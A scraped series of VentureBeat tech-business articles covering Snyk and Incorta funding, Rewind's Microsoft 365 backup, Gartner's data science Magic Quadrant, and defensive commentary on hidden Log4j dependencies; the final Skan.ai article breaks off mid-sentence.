"https://venturebeat.com/2021/09/30/salesforce-and-atlassian-double-down-on-developer-security-with-75m-snyk-investment"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Salesforce and Atlassian double down on developer security with $75M Snyk investment Share on Facebook Share on X Share on LinkedIn Snyk logo Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Let the OSS Enterprise newsletter guide your open source journey! Sign up here. Snyk , the company behind an open source security scanning platform, has extended its series F round of funding by another $75 million. The Boston-headquartered company announced a $530 million investment just a few weeks back at a whopping $8.5 billion valuation. The transaction included both primary and secondary investments, meaning that Snyk had in fact only raised around $300 million in fresh capital. For the extension, which closes the series F round off at $605 million, Snyk has attracted return investments from the venture capital arms of Atlassian and Salesforce, which are now responsible for 10% of Snyk’s $850 million total raised since its inception. And for the record, Snyk is now valued at $8.6 billion. By way of a brief recap, Snyk’s SaaS platform helps developers find and fix vulnerabilities — as well as surface license violations — in their open source codebases, containers, and Kubernetes applications. Founded initially out of London and Tel Aviv in 2015, Snyk has amassed an impressive roster of customers in its six-year history, including Google, Salesforce, Intuit, and Atlassian. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Strategic Atlassian’s follow-on investment in Snyk is particularly notable, as it comes shortly after Snyk announced a slew of integrations with Bitbucket Cloud and Atlassian Open DevOps, suggesting that Atlassian’s continued backing is as much a strategic move as it is anything else. “Snyk is reinventing the way organizations think about security,” Atlassian’s head of corporate development Chris Hecht said in a statement. “They are a vital part of our ecosystem, tightly integrated into our core products.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,118
2,021
"Rewind brings data backup and recovery to Microsoft 365 | VentureBeat"
"https://venturebeat.com/2021/12/07/rewind-brings-data-backup-and-recovery-to-microsoft-365"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Rewind brings data backup and recovery to Microsoft 365 Share on Facebook Share on X Share on LinkedIn Rewind now provides backup and recovery for Microsoft 365 Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Data backup and recovery platform Rewind is extending support to include Microsoft 365. The announcement comes just a couple of months after the Canadian company raised $65 million , with demand for cloud backup services growing due in large part to the remote work revolution that has driven uptake of SaaS-based online software. Founded out of Ottawa in 2015, Rewind has previously offered data backup services for businesses running Shopify, BigCommerce, Intuit QuickBooks, GitHub , and Trello. As of today, this list also includes Microsoft 365, with data backup and recovery available for Exchange Online, SharePoint, OneDrive for Business, Office 365 Groups, and Microsoft Teams. Above: Rewind now provides backup and recovery for Microsoft 365 Get backup While most SaaS platforms provide some disaster recovery and security tools at an infrastructure level so that they can help companies recover from systemwide catastrophes , the customer is ultimately responsible for their data at an individual account level, including password management, permissions, and — crucially — backing up data. By way of example, Microsoft’s very own terms of services specifically recommend using third-party backup services, noting: VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! We strive to keep the Services up and running; however, all online services suffer occasional disruptions and outages, and Microsoft is not liable for any disruption or loss you may suffer as a result. In the event of an outage, you may not be able to retrieve Your Content or Data that you’ve stored. We recommend that you regularly backup Your Content and Data that you store on the Services or store using Third-Party Apps and Service. This is what is known in industry parlance as a “shared responsibility” model, and this is where Rewind comes into play — it’s all about “versioning,” allowing SaaS customers to restore any file or piece of data to specific date and time. As Rewind looks to extend its reach into the enterprise, the company is also currently preparing data backup and recovery services across other major SaaS products , including HubSpot, Zendesk, GitLab, and Jira, which are expected to start rolling out in 2022. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,119
2,021
"Gartner’s 2021 Magic Quadrant cites 'glut of innovation' in data science and ML | VentureBeat"
"https://venturebeat.com/2021/03/14/gartners-2021-magic-quadrant-cites-glut-of-innovation-in-data-science-and-ml"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Gartner’s 2021 Magic Quadrant cites ‘glut of innovation’ in data science and ML Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Gartner’s Magic Quadrant report on data science and machine learning (DSML) platform companies assesses what it says are the top 20 vendors in this fast-growing industry segment. Data scientists and other technical users rely on these platforms to source data, build models, and use machine learning at a time when building machine learning applications is increasingly becoming a way for companies to differentiate themselves. Gartner says AI is still “overhyped” but notes that the COVID-19 pandemic has made investments in DSML more practical. Companies should focus on developing new use cases and applications for DSML — the ones that are visible and deliver business value, Gartner said in the report released last week. Smart companies should build on successful early projects and scale them. The report evaluates DSML platforms’ scope, revenue and growth, customer counts, market traction, and product capability scoring. Here are some of the notable findings: VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Responsible AI governance, transparency, and addressing model-based biases are the most valuable differentiators in this market, and every listed vendor is making progress in these areas. Google and Amazon are finally competing with Microsoft for supremacy in terms of DSML capabilities in the cloud. Amazon wasn’t even included in last year’s Magic Quadrant because it hadn’t shipped its core product by the November 2019 cutoff date. The longest-standing big names in this sector — IBM, MathWorks, and SAS — are still holding their ground and innovating with modern offerings and adaptive strategies. Numerous smaller, younger, and mid-size vendors are in sustained periods of hypergrowth. The growing size of the market feeds startups at all phases of the data science lifecycle. Gartner observes that growing at the rate of the market actually means growing slowly. Alibaba Cloud, Cloudera, and Samsung DDS are included in the Magic Quadrant for the first time. The DSML platform software market grew by 17.5% in 2019, generating $4 billion in revenue. It is the second-fastest-growing segment of the analytics and business intelligence (BI) software market behind modern BI platforms, which grew 17.9%. Its share of the overall analytics and BI market grew to 16.1% in 2019. The most innovative DSML vendors support various types of users collaborating on the same project: data engineers, expert data scientists, citizen data scientists, application developers, and machine learning specialists. There remains a “glut of compelling innovations” and visionary roadmaps, Gartner says. This is an adolescent market, where vendors are heavily focused on innovation and differentiation, rather than pure execution. Gartner said key areas of differentiation include UI, augmented DSML (AutoML), MLOps, performance and scalability, hybrid and multicloud support, XAI, and cutting-edge use cases and techniques (such as deep learning, large-scale IoT, and reinforcement learning). Above: Gartner Magic Quadrant for Data Science and Machine Learning Platforms. (Source: Gartner, March 2021) Data science and machine learning in 2021 and beyond For most enterprises, the challenge is to keep up with the rapid pace of change in their industries, driven by how fast their competitors, suppliers, and channel partners are digitally transforming their businesses. CIOs and senior management teams want to understand the specifics of how data science and machine learning models work. A top priority for IT executives working with DSML technologies is understanding bias mitigation and how DSML technologies can control for biases on a per-model basis. Designing transparency should start with model and data repositories, providing greater visibility across an entire DSML platform. Enterprises continue to struggle with moving more AI models from pilot to production. According to the 2020 Gartner AI in Organizations Survey , just 53% of machine learning prototypes are eventually deployed to production. Yield rates from the initial model to production deployment show room for improvement. Look for DSML vendors to step up their efforts to deliver modeling apps and platforms that can accept smaller datasets and still deliver accurate results. Open source software (OSS) is a de facto standard with DSML vendors. OSS provides enterprises the opportunity to get DSML projects up and running with little upfront spending. OSS adoption has become so pervasive that most DSML vendors rely on OSS, starting with Python, the most commonly used language. DSML platform providers also help optimize and curate OSS distributions. For any enterprise to invest in a DSML platform, integration and connectivity are essential. DSML vendors are adopting components for their platform architectures because components are more extensible and can be tailored to an enterprise’s specific needs. Packaged models that integrate into a DSML platform using APIs help enterprises customize machine learning models for specific industry challenges they’re facing. Designing more intuitive interfaces and workflows reduces the learning curve for lines of business and data analysts. Improvements in augmented data science and ML help offload all the data science and modeling work from experienced data scientists to business analysts who prefer to iterate models on their own, often changing constraints based on market conditions. Organizations rely on free and low-cost open source, combined with public cloud providers to reduce costs while experimenting with DSML initiatives. They are then likely to adopt commercial software to tackle broader use cases and requirements for team collaboration and to move models into production. Which vendors are leading — and why Here are some company-specific insights included in this year’s Magic Quadrant: SAS Visual Data Mining and Machine Learning (VDMML) is the market leader, having dominated the Leader quadrant for years in this specific Magic Quadrant. Gartner gives SAS credit for its cloud-native architecture, automated feature engineering and modeling, and domain expertise reflected in its advanced prototyping and production refinement use cases. SAS is often seen as a legacy vendor that’s expensive to implement and support. The customer loyalty SAS has accrued in global enterprises and the priority its development teams place on DSML helps the company maintain dominance in this market. IBM’s Watson Studio ascended into the Leader quadrant this year, up from being considered a Challenger in 2020. Gartner believes the company’s completeness of vision (horizontal axis of the quadrant) has improved since last year, moving it into the Leader quadrant. This is mainly due to IBM Watson Studio’s multi-persona support, depth of responsible AI and governance, and component structure proving effective for decision modeling. Building on several years of reinventing itself, IBM can deliver an enterprise-class DSML that will successfully progress beyond the pilot or proof-of-concept phase. Gartner gives IBM credit for capitalizing on previous successes of SPSS, ILOG CPLEX Optimization Studio, earlier analytics products, and the continual stream of innovations from IBM Research. Alteryx’s strong momentum in the market isn’t reflected in its shift from the Leader quadrant to Challenger. Alteryx powered through last year’s uncertainty , reporting a 19% year-over-year increase in revenue for 2020, reaching $495.3 million. Annual recurring revenue grew 32% year over year to reach $492.6 million. Gartner gives Alteryx credit for supporting multiple personas, a proven go-to-market strategy, and delivering excellent customer service and support. Alteryx has proven to be innovative, despite having that attribute mentioned as a caution in the Magic Quadrant. Amazon SageMaker’s market momentum is formidable, further strengthened by its pace of innovation. In February, Amazon Web Services (AWS) announced it has designed and will produce its own machine learning training chip. AWS Trainium is designed to deliver the most teraflops of any machine learning training instance in the cloud. AWS also announced Trainium would support all major frameworks (including TensorFlow, PyTorch, and MXnet). Trainium will use the same Neuron SDK used by AWS Inferentia (an AWS-designed chip for machine learning inference acceleration), making it easy for customers to get started training quickly with AWS Trainium. AWS Trainium is coming to Amazon EC2 and Amazon SageMaker in the second half of 2021. Amazon SageMaker comprises 12 components: Studio, Autopilot, Ground Truth, JumpStart, Data Wrangler, Feature Store, Clarify, Debugger, Model Monitor, Distributed Training, Pipelines, and Edge Manager. Google will launch its unified AI Platform in the first quarter of 2021. This is after the cutoff date for evaluation in this Magic Quadrant. It will release key features like AutoML tables, XAI, AI platform pipelines, and other MLOps services. The challenges for DSML platform vendors today begin with balancing the needs for greater transparency and bias mitigation while developing and delivering innovative new features at a predictable cadence. The Magic Quadrant reflects current market reality after updating with four new cloud vendors, one with an extensive ecosystem and proven market momentum. One thing to consider after looking at the Magic Quadrant is that there will be some mergers or acquisitions on the horizon. Look for BI vendors to either acquire or merge with DSML platform providers as the BI market’s direction moves toward augmented analytics and away from visualization. Further fueling potential M&A activity is the fact that DSML platforms could use enhanced data transformation and discovery support at the model level, which is a long-standing strength of BI platforms. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,120
2,021
"Incorta nabs $120M to power business data analytics | VentureBeat"
"https://venturebeat.com/2021/06/24/incorta-nabs-120m-to-power-business-data-analytics"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Incorta nabs $120M to power business data analytics Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Incorta , an analytics platform designed to speed up data ingestion, this week announced it has raised $120 million in funding contributed by Prysm Capital, with participation from National Grid Ventures, GV, Kleiner Perkins, M12, Sorenson Capital, Telstra Ventures, Ron Wohl, and Silicon Valley Bank (in the form of a credit facility). CEO Scott Jones says the capital, which brings Incorta’s total raised to $195 million, will be used to expand go-to-market operations and meet demand for Incorta’s analytics products. According to a recent IDC study, 70% of CEOs acknowledge that their organization needs to become more data-driven, with 87% saying becoming more agile and integrated over the next five years is a top priority. Meanwhile, a new study from Ventana Research highlights where companies struggle most with data analytics. Fifty-five percent of organizations report that the most time-consuming analytics task is preparing the data. According to Ventana, 25% of organizations combine more than 20 sources in their data preparation activities, and 39% use more than 104. Incorta, which was founded in 2014 by Oracle veterans Hichem Sellami, Klaus Fabian, Matthew Halliday, and Osama Elkady, aims to help companies acquire, enrich, analyze, and act upon business data. It can make upwards of tens of billions of rows of data “analytics-ready” without the need to pre-aggregate, reshape, or transform the data in any way, connecting to enterprise apps, data streams, and data files via over 240 integrations. Above: Incorta’s management dashboard. “The unprecedented events of the past year highlight the importance of modern data analytics in today’s business environment — platforms and tools like Incorta that deliver data to users directly without costly systems and processes like data warehousing,” Jones said in a press release. “After hitting a major inflection point in 2020, Incorta is now scaling fast to meet global demand for modern data analytics in the cloud.” VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Data transformation Ninety-five percent of businesses cite the need to manage unstructured data as a problem , and 80% to 90% of the data companies generate today is unstructured, according to CIO. Incorta aims to address this by offering an enriched metadata map combined with smart query routing. The result is a repository for analytics and machine learning — one that can be run on-premises, hosted by a cloud provider, or delivered as a fully managed cloud service. Incorta can run as a complete standalone data and analytics pipeline or as a component within a larger analytics and business intelligence tech portfolio, depending on an organization’s data analytics needs. “Companies have an increasing need to gain insight and make decisions from data with speed and agility, and Incorta provides this mission-critical solution with a differentiated offering,” Prysm Capital partner Muhammad Mian said in a statement. “Prysm is excited to partner with an exceptional management team to support the growth of a product that is at the intersection of attractive long-term trends: the explosion of data, digital and cloud transformation, and business intelligence modernization.” Incorta’s series D follows a year in which nearly 60% of the company’s new revenue came from organic expansion with existing customers across media and entertainment, social, high tech, ecommerce, and retail markets. Incorta recently launched Incorta Mobile, a data analytics experience for mobile devices, as well as initiating partnerships with Microsoft Azure, Google Cloud, eCapital, and Tableau. It has also established a footprint in North America, the Middle East, the U.K., and Japan. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,121
2,022
"How Incorta uses AI to address supply-chain issues | VentureBeat"
"https://venturebeat.com/2022/01/04/how-incorta-uses-ai-to-address-supply-chain-issues"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages How Incorta uses AI to address supply-chain issues Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Prior to this pandemic year of 2021, the term “supply chain” didn’t raise many red flags for most consumers, frankly because they didn’t have to think about it. Everything just happened. Buyers were so accustomed to getting things on schedule that it rarely became a regular topic of conversation. That all changed in the second half of 2021. With the pandemic slowing down production lines and transportation in faraway places, the term “ supply chain ” is now regularly in headlines. This has been the greatest shock to global supply chains in modern history. Buyers often have to wait months for raw materials, durable goods, building materials, electronic devices, apparel, toys, and numerous other items. At the end of the calendar year, this remains a nagging problem that may continue well into 2022 – or even 2023. As a result, supply-chain managers now are placing bets that may determine, in large measure, the fate of their companies. They’re desperate for visibility into all links in the chain – using portals many have never had before – but a number of them are flying blind with little or no control over the flow of their goods. Supply chain managers struggle with how to best view and control logistics to get goods trapped in millions of 40×8-foot containers on ships waiting off ports in Oakland, Los Angeles, Long Beach, the eastern seaboard, and the Suez Canal onto trucks and trains and out to retailers. Solutions for this include those from companies such as SAP , Cin7 , Oracle NetSuite , InfoPlus , and Anvyl. These suppliers make complex collections of point products that include controls for demand forecasting and management of import/export, inventory, shipping, suppliers, transportation, and warehousing. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! These mostly legacy applications can be difficult to use, and they weren’t designed with optimal usability in mind. The good news is that there’s innovation happening in this market. Welcome unified data analytics Relative newcomer Incorta , which makes a software-as-a-service (SaaS)-based unified data analytics platform that includes the above functions, comes at the supply chain from a different perspective. Its single-screen platform puts all a company’s data into a single system, replacing various separate tools, to move data from source locations into a form that both line-of-business staff members and data scientists can use more effectively. This is the data analysis that’s used to project and/or identify supply-chain snags and find ways to solve them, similar to the way GPS routes drivers around traffic snarls. “ Incorta builds and deploys machine-learning models,” CIO Brian Keare told VentureBeat. “That’s in great part because our unified data analytics platform enables you to directly analyze raw, untransformed data – which is exactly the kind of data that is needed for machine learning. “This has several implications: to begin with, it brings business analytics and data science together into closer alignment because both can operate on the same platform and work with the exact same data. For data scientists, that means no more developing models in a bubble and no more running with unrealistic data sets that ultimately fail in production. What’s more, it means that data scientists don’t have to spend so much time acquiring data, building a pipeline, and transferring results to another system to visualize and share results – a lot of this ‘grunt work’ is handled by the platform.” “You can take a look at what your alternatives are, given that you’re out of stock on certain things,” Keare said. “Say your goods are stuck in on ships waiting to clear customs off the Port of Los Angeles. As opposed to a bunch of manual spreadsheets and trying to figure it out manually, you’ve got just one pane-of-glass view of what’s going on, and you can really look at what your alternatives are.” How the AI is implemented In order for technologists, data architects, and software developers to learn more about how to use AI, VentureBeat asked Keare the product applies AI. VentureBeat: What AI and ML tools are you using specifically? Brian Keare: Incorta’s unified data analytics platform bundles in and tightly integrates Spark, so that any library – whether open-source or commercial – can be used with it. Incorta also ships out of the box with favorites such as Scikit-learn, Spark-ML, FBprophet (Facebook prophet), and others. We also have utility libraries that make it easy to retrieve data from Incorta, save data frames back to Incorta, and then examine and visualize intermediate results in our embedded notebook interface. VentureBeat: Are you using models and algorithms out of a box — for example, from DataRobot or other sources? Keare: Incorta is a platform for analytics and developing ML models. We include some common Python libraries, but we also have a data API that can be used with external notebooks and third-party ML tools like DataRobot, Dataiku, H2O, and others. As a unified platform, Incorta is built with open standards and easily integrates with cloud-friendly tools and platforms. VentureBeat: What cloud service are you using mainly? Keare: Incorta is currently hosted on the Google Cloud Platform by default and other cloud services on request. We’re working with the other cloud vendors to make their platforms a turnkey, user-selectable option. VentureBeat: Are you using a lot of the AI workflow tools that come with that cloud? Keare: Incorta provides data scientists with an end-to-end platform that can be used to build AI workflows. More specifically, Incorta ingests data and then provides that data to a Spark-based ML/AI workflow. You can easily incorporate external tools as well, including other AI tools in the cloud. VentureBeat: How much do you do yourselves? Keare: Incorta takes data that is ingested into our UDAP (universal data access protocol) and makes it available to the ML/AI workflows developed within the Incorta product. VentureBeat: How are you labeling data for the ML and AI workflows? Keare: The ML workflow, including data labeling, is typically done using notebooks, which are then executed within the platform. These notebooks can be scheduled and orchestrated against other platform operations like data extraction. VentureBeat: Can you give us a ballpark estimate on how much data you are processing? Keare: While we don’t specifically track and measure how much data Incorta processes, we’re speaking with customers all the time and there are many who are processing many billions of rows of data every day using our platform. Some of the most valuable companies in the world today are Incorta customers. Incorta is used by companies such as Starbucks, Broadcom, Duluth Trading Co., and Shutterfly. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,122
2,021
"'Less obvious' uses of Log4j pose a major risk | VentureBeat"
"https://venturebeat.com/2021/12/13/less-obvious-uses-of-log4j-pose-a-major-risk"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages ‘Less obvious’ uses of Log4j pose a major risk Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Log4Shell, the Apache Log4j vulnerability that has sent every security team scrambling since its disclosure on Thursday, brings massive cybersecurity risk because the flaw is so easy to exploit and the usage of Log4j is widespread in software. But the wide deployment of Log4j, on its own, is not why the Log4Shell flaw is so troubling. The most concerning part may be the fact that much of Log4j’s usage is essentially buried, making it extraordinarily difficult to detect and fix. Log4j is an open source logging library that is often packaged in with other pieces of software to make those additional pieces work. But in many cases, there’s no real or obvious boundaries between Log4j and the pieces of software it powers, said John Hammond, senior security researcher at Huntress. “Log4j is versatile and makes up an important foundational block for lots of software — and it’s those less obvious pieces that make this such a troublesome situation,” Hammond said. “The way that Log4j is packaged up with other software or programs makes it harder to spot which applications may potentially be vulnerable.” Hard to detect Research from Snyk has found that among Java applications using Log4j, 60% use the logging library “indirectly” — meaning that they use a Java framework that contains Log4j rather than directly using Log4j itself. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! “That does indeed make it harder to detect that you’re using it — and harder to remediate,” said Guy Podjarny, cofounder and president of Snyk. The Log4Shell vulnerability impacts a broad swath of enterprise software and cloud services, and many applications written in Java are potentially vulnerable. The remote code execution (RCE) vulnerability can ultimately enable an attacker to remotely access and control devices. Researchers have disclosed exploits so far including deployment of malware and installation of Cobalt Strike, a popular tool with cybercriminals that is often seen as a precursor to deploying ransomware. Hiding in code Internal research from Wiz suggests that more than 89% of all environments have vulnerable Log4j libraries, according to Wiz cofounder and chief technology officer Ami Luttwak. And “in many of them, the dev teams are sure they have zero exposure — and are surprised to find out that some third-party component is actually built using Java,” Luttwak said. Dor Dali, director of information security at Vulcan Cyber, agreed that the widespread adoption of Log4j “makes it likely that it is hiding in a lot of code.” While not unique to the Log4j situation, “developers not fully knowing what software they are running” is an issue likely to be exposed again by this vulnerability, Dali said. The whole objective of development libraries, of course, is to make a developer’s life easier by reducing the repetitive tasks and providing some abstraction, said Vitor Ventura, senior security researcher at Cisco Talos. However, in this situation, “it is perfectly feasible that the developer doesn’t know that Log4j is being used on some of the components they are using, whether it is a library or an application server,” Ventura said. Fix what you know Casey Ellis, founder and chief technology officer at Bugcrowd, said that during the initial phases of responding to the vulnerability, “it’s important to focus on what you ‘do’ know and ‘can’ fix first.” “But organizations — especially larger ones — would be wise to operate on the assumption that they have unknown vulnerable Log4j in their environment, and make plans to mitigate the risks created by these as well,” Ellis said. Controls that can help reduce the risk posed by “shadow” Log4j include blocking known malicious Log4Shell attempts using web application firewall (WAF) technology and other similar filtering technology, as well as egress filtering of outbound connections at the firewall and internal DNS, according to Ellis. Inbound filtering will deal with the noise and limit the ability of a casual attacker to land an exploit on an unknown Log4j instance, and egress filtering will limit the impact of data exfiltration — or retrieval of a second-stage payload — should an attacker be successful against a vulnerable instance, he said. Layered defense Davis McCarthy, principal security researcher at Valtix, said businesses should stick to the principles of layered defense and assume that it’s not “if” but “when” you get hacked. Along with WAF technology, another approach for “virtual patching” can include implementing an intrusion prevention system (IPS), McCarthy said. Businesses should also enable workload segmentation and traffic filtering to ensure that only allowed connections happen to and from their applications, he said. “It often takes weeks or longer to patch a vulnerability like this, and we haven’t necessarily seen the worst of it,” McCarthy said. In a world where vendors “don’t report or aren’t even aware of all the software used in their solutions, defenders must fall back to detection and response,” said Rick Holland, chief information security officer at Digital Shadows. Zero-trust principles of network segmentation, monitoring, and least privilege are the controls that defenders must leverage to minimize these risks, Holland said. Software Bill of Materials Longer-term, businesses should collectively pressure vendors to provide a Software Bill of Materials (SBOM), which details all the components in a piece of software, Holland said. SBOMs would help in a situation like this because they would show all of the transitive dependencies of an application, along with the original open source library that was purposefully brought into the app, said Brian Fox, chief technology officer at Sonatype. Ultimately, “if you’re not paying attention to your transitive dependencies, you’re not really protecting yourself fully,” Fox said. “This is a fixable thing though. With the right tools, and automation in place, companies and vendors can stay on top of this. And it all starts with a software bill of materials for every single application in your organization.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,123
2,020
"Skan raises $14 million to automate repetitive business processes with computer vision | VentureBeat"
"https://venturebeat.com/2020/10/27/skan-raises-14-million-to-automate-repetitive-business-processes-with-computer-vision"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Skan raises $14 million to automate repetitive business processes with computer vision Share on Facebook Share on X Share on LinkedIn Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. Skan.ai , an AI-enabled process discovery and operational intelligence platform, today closed $14 million in funding. The company says the proceeds will be put toward accelerating Skan’s go-to-market and product R&D efforts. Process discovery and automation is understandably big business in the enterprise. Forrester estimates that robotic process automation (RPA) and related subfields created jobs for 40% of companies in 2019. According to a McKinsey survey , at least a third of activities could be automated in about 60% of occupations, which might be why Market and Markets anticipates the RPA market alone will be worth $493 billion by 